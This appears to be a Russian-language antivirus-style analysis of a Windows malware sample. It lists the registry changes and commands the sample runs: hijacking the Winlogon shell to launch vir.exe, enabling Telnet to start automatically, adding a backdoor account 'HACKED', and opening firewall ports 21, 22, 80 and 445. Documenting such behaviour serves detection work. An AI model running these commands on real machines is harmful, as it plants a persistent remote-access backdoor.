Техническая информация
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] 'shell' = 'Explorer.exe c:vir.exe'
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\net1.exe user HACKED 123456789 /add
- <SYSTEM32>\sc.exe start tlntsvr
- <SYSTEM32>\net1.exe localgroup %USERNAME%s HACKED /add
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\netsh.exe firewall add portopening tcp 21 MyWebPort Enable
- <SYSTEM32>\netsh.exe firewall add portopening tcp 80 MyWebPort Enable
- <SYSTEM32>\netsh.exe firewall add portopening tcp 22 MyWebPort Enable
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- <SYSTEM32>\netsh.exe firewall add portopening tcp 445 MyWebPort Enable
- <Текущая директория>\start up.exe
- C:\vir.exe